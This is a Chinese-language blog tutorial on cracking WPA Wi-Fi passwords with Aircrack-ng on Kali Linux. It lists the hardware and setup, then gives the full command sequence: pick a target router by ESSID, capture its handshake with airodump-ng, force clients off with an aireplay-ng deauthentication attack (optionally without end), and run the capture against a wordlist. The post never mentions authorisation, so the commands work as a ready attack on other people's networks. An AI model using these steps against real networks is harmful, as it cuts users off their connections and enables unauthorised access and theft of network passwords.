当前位置: 首页 > 工具软件 > JES-NG > 使用案例 >

Aircrack-ng不完全手册

彭华皓
2023-12-01

用windows版的Aircrack-ng就别想了,官方是这样说的

IMPORTANT Information Regarding Windows Version IMPORTANT
The windows version requires you to develop your own DLLs to link aircrack-ng to your wireless card. The required DLLs are not provided in the download nor available anywhere on the Internet. Without these DLLs, the windows version will not function. Do NOT post questions or problems to the forum regarding the windows version. At present, there is no support provided.

原文地址

如果你能自己开发dll的话给我也来一份呗 #滑稽



1、准备

  1. 带monitor功能的外接USB网卡
    参考链接:
    https://blog.csdn.net/qq_28208251/article/details/47177785
    https://blog.csdn.net/qq_28208251/article/details/47154501
    https://www.aircrack-ng.org/doku.php?id=compatible_cards
    ps:如果发现你的网卡不在这些资料里,但是支持monitor功能,可以把2和3安装好,用接下来的步骤测试一下自己的网卡支不支持Aircrack-ng

  2. VMware虚拟机,版本越新越好

  3. Kali Linux系统
    https://www.kali.org/

  4. 字典
    网上搜索或者自己做

2、安装

  1. 安装VMware,在虚拟机里安装Kali Linux
    Kali安装教程
    ps:我第一次安装Kali的时候选是的中文,结果打开系统发现全是乱码,所以重新安装了一个英文的。建议大家安装的时候选英文。

3、跑字典

  1. 打开Kali,登录后进入控制台(Terminal Emulator)
    参考这篇文章或者官方文章开启网卡的monitor模式
    ps:如果输入命令后显示bash:xxxxx:command not found,就要在每条命令行前加一个sudo命令,下文的命令也同样适用

  2. 成功开启monitor模式后,开始抓包
    ps:这里写的是aircrack-ng驱动的网卡的抓包方法,madwifi-ng驱动的网卡的抓包方法需要稍做改动,参考官方文章的Aircrack-ng suite
    首先kill掉影响监听的进程:

    airmon-ng check kill
    

    开启监听模式:

    airodump-ng wlan0mon
    

    根据ESSID判断你要抓包的路由,记录这个路由的BSSID和CH后,开始抓包:

    airodump-ng -c 你记录的CH --bssid 你记录的BSSID -w 握手包放置路径 wlan0mon
    

    抓包时耐心等待最下方的列表出现数据,出现数据之后记录STATION,如果等待的时间足够长,还能出现多个STATION。得到STATION之后开始对路由发起deauth攻击(50代表50次攻击,如果改成0就是一直攻击):

    aireplay-ng -0 50 -a 你记录的BSSID -c 你记录的STATION wlan0mon
    

    攻击结束后,查看有没有抓到可用的握手包:

    aircrack-ng 握手包的位置
    

    如果抓到包了,就开始跑字典:

    aircrack-ng -w 字典的位置 握手包的位置
    

    当然,你也可以把握手包拿到别的软件或者系统上跑字典,转移握手包的方法很多,可以直接用u盘,也可以安装VMware Tools使用共享文件夹,还可以使用虚拟机桥接或着NAT模式,教程网上都有,可以自己搜
    推荐的跑字典软件:EWSA

如果有错误还请大家多多指教

 类似资料: